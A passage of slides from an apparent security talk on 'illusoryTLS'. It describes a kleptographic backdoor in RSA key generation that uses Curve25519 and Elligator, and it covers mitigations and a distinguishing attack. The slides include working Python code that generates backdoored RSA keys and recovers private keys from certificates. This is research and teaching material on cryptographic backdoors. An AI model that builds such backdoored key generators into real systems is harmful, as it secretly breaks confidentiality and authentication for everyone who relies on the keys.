  • 117. ... Key Takeaway . Impact . 79/103 As long as the implementations of RSA — or, more generally, algorithms vulnerable to this class of attacks — used by trusted entities (e.g., CA) cannot be audited by relying parties (e.g., x.509 end-entities), any trust-anchor for the same trusted entities (e.g., root certificate) is to be regarded as a potential backdoor
  • 118. ... Key Takeaway - Ctd . Impact . 80/103 As long as the implementation of algorithms adopted by CAs and vulnerable to this class of backdoors cannot be audited by relying parties, the assurance provided by illusoryTLS (i.e., none whatsoever) is not any different from the assurance provided by systems relying upon TLS and RSA certificates for origin authentication, confidentiality, and message integrity guarantees
  • 119. ... Mitigations . Impact . 81/103 . Key Pinning, RFC 7469, Public Key Pinning Extension for HTTP (HPKP), April 2015 . Certificate Transparency, RFC 6962, June 2013 . DANE, DNS-based Authentication of Named Entities, RFC 6698, August 2012 . Tack, Trust Assertions for Certificate Keys, dra -perrin-tls-tack-02.txt, Expired . Proper explicit cross-certification
  • 120. .... A Backdoor Embedding Algorithm . 82/103 ABackdoorEmbeddingAlgorithm
  • 121. ... Subtleness . A Backdoor Embedding Algorithm . 83/103 The subtleness of a backdoor planted in a cryptographic credential resides in the absence of malicious logic in the system whose security it erodes.
  • 122. ... An attack variant . A Backdoor Embedding Algorithm . 84/103 ... RyanC — https://gist.github.com/ryancdotorg/18235723e926be0afbdd
  • 123. ... Idea . A Backdoor Embedding Algorithm . 85/103 1. Embed a Curve25519 public-key into the key-generator
  • 124. ... Idea . A Backdoor Embedding Algorithm . 85/103 1. Embed a Curve25519 public-key into the key-generator 2. Generate an ephemeral Curve25519 key at random
  • 125. ... Idea . A Backdoor Embedding Algorithm . 85/103 1. Embed a Curve25519 public-key into the key-generator 2. Generate an ephemeral Curve25519 key at random 3. Compute a shared secret using Elliptic Curve Diffie-Hellman
  • 126. ... Idea . A Backdoor Embedding Algorithm . 85/103 1. Embed a Curve25519 public-key into the key-generator 2. Generate an ephemeral Curve25519 key at random 3. Compute a shared secret using Elliptic Curve Diffie-Hellman 4. Use the shared secret to seed at cryptographically secure pseudo-random number generator (CSPRNG) based on AES run in CTR mode
  • 127. ... Idea . A Backdoor Embedding Algorithm . 85/103 1. Embed a Curve25519 public-key into the key-generator 2. Generate an ephemeral Curve25519 key at random 3. Compute a shared secret using Elliptic Curve Diffie-Hellman 4. Use the shared secret to seed at cryptographically secure pseudo-random number generator (CSPRNG) based on AES run in CTR mode 5. Generate a normal RSA key using the seeded CSPRNG
  • 128. ... Idea . A Backdoor Embedding Algorithm . 85/103 1. Embed a Curve25519 public-key into the key-generator 2. Generate an ephemeral Curve25519 key at random 3. Compute a shared secret using Elliptic Curve Diffie-Hellman 4. Use the shared secret to seed at cryptographically secure pseudo-random number generator (CSPRNG) based on AES run in CTR mode 5. Generate a normal RSA key using the seeded CSPRNG 6. Replace 32-bytes of the generated modulus with the ephemeral Curve25519 public-key
  • 129. ... Idea . A Backdoor Embedding Algorithm . 85/103 1. Embed a Curve25519 public-key into the key-generator 2. Generate an ephemeral Curve25519 key at random 3. Compute a shared secret using Elliptic Curve Diffie-Hellman 4. Use the shared secret to seed at cryptographically secure pseudo-random number generator (CSPRNG) based on AES run in CTR mode 5. Generate a normal RSA key using the seeded CSPRNG 6. Replace 32-bytes of the generated modulus with the ephemeral Curve25519 public-key 7. Use the original prime factors to compute two new primes leading to a new modulus embedding the ephemeral public-key
  • 130. ... Idea . A Backdoor Embedding Algorithm . 85/103 1. Embed a Curve25519 public-key into the key-generator 2. Generate an ephemeral Curve25519 key at random 3. Compute a shared secret using Elliptic Curve Diffie-Hellman 4. Use the shared secret to seed at cryptographically secure pseudo-random number generator (CSPRNG) based on AES run in CTR mode 5. Generate a normal RSA key using the seeded CSPRNG 6. Replace 32-bytes of the generated modulus with the ephemeral Curve25519 public-key 7. Use the original prime factors to compute two new primes leading to a new modulus embedding the ephemeral public-key 8. Output the RSA key with the secretly embedded backdoor
  • 131. ... Key Recovery . A Backdoor Embedding Algorithm . 86/103 1. Extracts the ephemeral Curve25519 public-key from the target modulus
  • 132. ... Key Recovery . A Backdoor Embedding Algorithm . 86/103 1. Extracts the ephemeral Curve25519 public-key from the target modulus 2. Computes the shared secret via ECDH and using the private-key associated to the public-key embedded in the key generator
  • 133. ... Key Recovery . A Backdoor Embedding Algorithm . 86/103 1. Extracts the ephemeral Curve25519 public-key from the target modulus 2. Computes the shared secret via ECDH and using the private-key associated to the public-key embedded in the key generator 3. Uses the shared secret to seed the CSPRNG based on AES run in CTR mode
  • 134. ... Key Recovery . A Backdoor Embedding Algorithm . 86/103 1. Extracts the ephemeral Curve25519 public-key from the target modulus 2. Computes the shared secret via ECDH and using the private-key associated to the public-key embedded in the key generator 3. Uses the shared secret to seed the CSPRNG based on AES run in CTR mode 4. Generates a normal RSA key using the seeded CSPRNG
  • 135. ... Key Recovery . A Backdoor Embedding Algorithm . 86/103 1. Extracts the ephemeral Curve25519 public-key from the target modulus 2. Computes the shared secret via ECDH and using the private-key associated to the public-key embedded in the key generator 3. Uses the shared secret to seed the CSPRNG based on AES run in CTR mode 4. Generates a normal RSA key using the seeded CSPRNG 5. Replaces 32-bytes of the generated modulus with the ephemeral Curve25519 public-key
  • 136. ... Key Recovery . A Backdoor Embedding Algorithm . 86/103 1. Extracts the ephemeral Curve25519 public-key from the target modulus 2. Computes the shared secret via ECDH and using the private-key associated to the public-key embedded in the key generator 3. Uses the shared secret to seed the CSPRNG based on AES run in CTR mode 4. Generates a normal RSA key using the seeded CSPRNG 5. Replaces 32-bytes of the generated modulus with the ephemeral Curve25519 public-key 6. Uses the original prime factors to compute two new primes leading to the target modulus embedding the ephmeral public-key
  • 137. ... Key Recovery . A Backdoor Embedding Algorithm . 86/103 1. Extracts the ephemeral Curve25519 public-key from the target modulus 2. Computes the shared secret via ECDH and using the private-key associated to the public-key embedded in the key generator 3. Uses the shared secret to seed the CSPRNG based on AES run in CTR mode 4. Generates a normal RSA key using the seeded CSPRNG 5. Replaces 32-bytes of the generated modulus with the ephemeral Curve25519 public-key 6. Uses the original prime factors to compute two new primes leading to the target modulus embedding the ephmeral public-key 7. Output the recovered RSA private key
  • 138. ... Broken . A Backdoor Embedding Algorithm . 87/103 .. . Although the idea is nice . The key pairs generated using this algorithm fall short in terms of indistiguishability . It is easy to tell backdoored certificates apart from genuine RSA certificate using only black-box access
  • 139. .... A Backdoor Embedding Algorithm . 88/103 Does anybody see why this is the case?
  • 140. ... Distinguishing Attack . A Backdoor Embedding Algorithm . 89/103 . A public-key embedded into an RSA modulus
  • 141. ... Distinguishing Attack . A Backdoor Embedding Algorithm . 89/103 . A public-key embedded into an RSA modulus . Elliptic curve public-keys are points on the curve
  • 142. ... Distinguishing Attack . A Backdoor Embedding Algorithm . 89/103 . A public-key embedded into an RSA modulus . Elliptic curve public-keys are points on the curve . And elliptic curve points are easily distinguished from uniform random strings
  • 143. ... Distinguishing Attack . A Backdoor Embedding Algorithm . 89/103 . A public-key embedded into an RSA modulus . Elliptic curve public-keys are points on the curve . And elliptic curve points are easily distinguished from uniform random strings . A security evaluator could check if the coordinates encoded using the candidate 32-byte substrings of the modulus satisfy the elliptic curve equation
  • 144. ... Repairing the Backdoor . A Backdoor Embedding Algorithm . 90/103 If we could make the elliptic curve points indistinguishable from random strings, then the backdoor indistinguishability would be retained
  • 145. ... Elligator . A Backdoor Embedding Algorithm . 91/103 .. . Censorship sucks! . Daniel J. Bernstein, Anna Krasnova, Mike Hamburg, Tanja Lange . an encoding for points on a single curve as strings indistiguishable from uniform random strings . http://elligator.cr.yp.to
  • 146. ... Inherently Dual Use . A Backdoor Embedding Algorithm . 92/103 ... All cyber security technology is inherently dual use
  • 147. ... Undetectability for Good or Ill . A Backdoor Embedding Algorithm . 93/103 .. . Just like any and all cyber security tools . Undetectability of curve points can be used for good or ill . For censorship-circumvention or surveillance
  • 148. ... Between Offense and Defense . A Backdoor Embedding Algorithm . 94/103 I believe we can positively contribute to the discussion and practice of information security by walking the fine line between offense and defense
  • 149. ... Code . A Backdoor Embedding Algorithm . 95/103 . Website — http://illusorytls.com . illusoryTLS — https://github.com/secYOUre/illusoryTLS . pyelligator — https://github.com/secYOUre/pyelligator . rsaelligatorbd — https://github.com/secYOUre/rsaelligatorbd
  • 150. ... Elligator backdoor embedding . A Backdoor Embedding Algorithm . 96/103 . Embed a Curve25519 public-key into the key-generator ..MASTER_PUB_HEX = ’525e422e42c9c662362a7326c3c5c785ac7ef52e86782c4ac3c06887583e7a6f’ master_pub = unhexlify(MASTER_PUB_HEX)
  • 151. ... Elligator backdoor embedding . A Backdoor Embedding Algorithm . 96/103 . Generate an ephemeral Curve25519 key at random and the associated uniform representative string .. while True: private = urandom(32) (v, pub, rep) = elligator.scalarbasemult(private) if v: break
  • 152. ... Elligator backdoor embedding . A Backdoor Embedding Algorithm . 96/103 . Compute a shared secret using ECDH . Use the shared secret to seed a CSPRNG based on AES run in CTR mode .. # combine the ECDH keys to generate the seed seed = nacl.crypto_box_beforenm(master_pub, private) prng = AESPRNG(seed)
  • 153. ... Elligator backdoor embedding . A Backdoor Embedding Algorithm . 96/103 . Generate a normal RSA key using the seeded CSPRNG .. # deterministic key generation from seed rsa = build_key(embed=rep, pos=80, randfunc=prng.randbytes) ... def build_key(bits=2048, e=65537, embed=’’, pos=1, randfunc=None): # generate base key rsa = RSA.generate(bits, randfunc)
  • 154. ... Elligator backdoor embedding . A Backdoor Embedding Algorithm . 96/103 . Replace 32-bytes of the generated modulus with the representative string associated to the ephemeral Curve25519 public-key .. # extract modulus as a string n_str = unhexlify(str(hex(rsa.n))[2:-1]) # embed data into the modulus n_hex = hexlify(replace_at(n_str, embed, pos)) ... # overwrite some bytes in orig at a specificed offset def replace_at(orig, replace, offset): return orig[0:offset] + replace + orig[offset+len(replace):]
  • 155. ... Elligator backdoor embedding . A Backdoor Embedding Algorithm . 96/103 . Use the original prime factors to compute to new primes leading to a new modulus embedding the uniform representative string .. n = gmpy.mpz(n_hex, 16) p = rsa.p # compute a starting point to look for a new q value pre_q = n / p # use the next prime as the new q value q = pre_q.next_prime() n = p * q phi = (p-1) * (q-1) # compute new private exponent d = gmpy.invert(e, phi) # make sure that p is smaller than q if p > q: (p, q) = (q, p)
  • 156. ... Elligator backdoor embedding . A Backdoor Embedding Algorithm . 96/103 . Output the backdoored RSA key ..return RSA.construct((long(n), long(e), long(d), long(p), long(q)))
  • 157. ... Key Recovery . A Backdoor Embedding Algorithm . 97/103 . Extracts the representative string from the target modulus .. #Load an x.509 certificate from a file x509 = X509.load_cert(sys.argv[2]) # Pull the modulus out of the certificate orig_modulus = unhexlify(x509.get_pubkey().get_modulus()) (seed, rep) = recover_seed(key=sys.argv[1], modulus=orig_modulus, pos=80) ... def recover_seed(key=’’, modulus=None, pos=1): ... rep = modulus[pos:pos+32]
  • 158. ... Key Recovery . A Backdoor Embedding Algorithm . 97/103 . Maps the representative string to the candidate ephemeral Curve25519 public-key ..pub = elligator.representativetopublic(rep)
  • 159. ... Key Recovery . A Backdoor Embedding Algorithm . 97/103 . Computes the shared secret via ECDH and using the private-key associated to the public-key embedded in the key-generator . Uses the shared secret to seed the CSPRNG based on AES run in CTR mode .. def recover_seed(key=’’, modulus=None, pos=1): # recreate the master private key from the passphrase master = sha256(key).digest() ... # compute seed with master private and ephemeral public key return (nacl.crypto_box_beforenm(pub, master), rep) ... (seed, rep) = recover_seed(key=sys.argv[1], modulus=orig_modulus, pos=80) prng = AESPRNG(seed)
  • 160. ... Key Recovery . A Backdoor Embedding Algorithm . 97/103 . Generates a normal RSA key using the seeded CSPRNG .. # deterministic key generation from seed rsa = build_key(embed=rep, pos=80, randfunc=prng.randbytes) ... def build_key(bits=2048, e=65537, embed=’’, pos=1, randfunc=None): # generate base key rsa = RSA.generate(bits, randfunc)
  • 161. ... Key Recovery . A Backdoor Embedding Algorithm . 97/103 . Replaces 32-bytes of the generated modulus with the representative string found in the target modulus .. # extract modulus as a string n_str = unhexlify(str(hex(rsa.n))[2:-1]) # embed data into the modulus n_hex = hexlify(replace_at(n_str, embed, pos))
  • 162. ... Key Recovery . A Backdoor Embedding Algorithm . 97/103 . Uses the original prime factors to compute two new primes leading to the target modulus embedding the uniform representative string .. n = gmpy.mpz(n_hex, 16) p = rsa.p # compute a starting point to look for a new q value pre_q = n / p # use the next prime as the new q value q = pre_q.next_prime() n = p * q phi = (p-1) * (q-1) # compute new private exponent d = gmpy.invert(e, phi) # make sure that p is smaller than q if p > q: (p, q) = (q, p)
  • 163. ... Key Recovery . A Backdoor Embedding Algorithm . 97/103 . Output the recovered RSA key ..return RSA.construct((long(n), long(e), long(d), long(p), long(q))) ... print rsa.exportKey()
  • 165. ..
  • 166. .. “ Though I am o en in the depths of misery, there is still calmness, pure harmony and music inside me. Vincent van Gogh.. ”
  • 167. .. “ Though we are o en in the depths of insecurity, there is still calmness, pure harmony and music inside us. .. ”
  • 169. Q ?
  • 171. ... Normal RSA Key Generation — Young and Yung . Backup . 105/103 1. Let e be the public RSA exponent (e.g., 216 + 1) 2. Choose a large number p randomly (e.g., 1024 bits long) 3. If p is composite or gcd(e, p − 1) ̸= 1 then goto to step 1 4. Choose a large number q randomly (e.g., 1024 bits long) 5. If q is composite or gcd(e, p − 1) ̸= 1 then goto to step 3 6. Output the public-key (N = pq, e) and the private-key p 7. The private exponent d is found by solving for (d, k) in ed + kϕ(n) = 1 using the extended Euclidean algorithm
  • 172. ... RSA Encryption/Decryption — Young and Yung . Backup . 106/103 . N = p ∗ q, where p and q are large primes known to the key owner . Everyone knows N and e . Let d be a privete key exponent where ed = 1mod(p − 1)(q − 1) . To encrypt m ∈ Z∗ n (a er padding) compute: c = me modN . To decrypt the ciphertext c compute: m = cd modN . As far as we know: Only with known factorization given N and e, one can find d
  • 173. ... Elliptic Curve Decision Diffie-Hellman Problem . Backup . 107/103 . Let C an elliptic-curve equation over the finite field Fq with prime order n . Let G be the base point of the curve . Given three point elements (xG), (yG) and (zG) . Decide whether (zG = xyG), or not . Where (x, y, z) are chosen randomly and 1 < x, y, z < n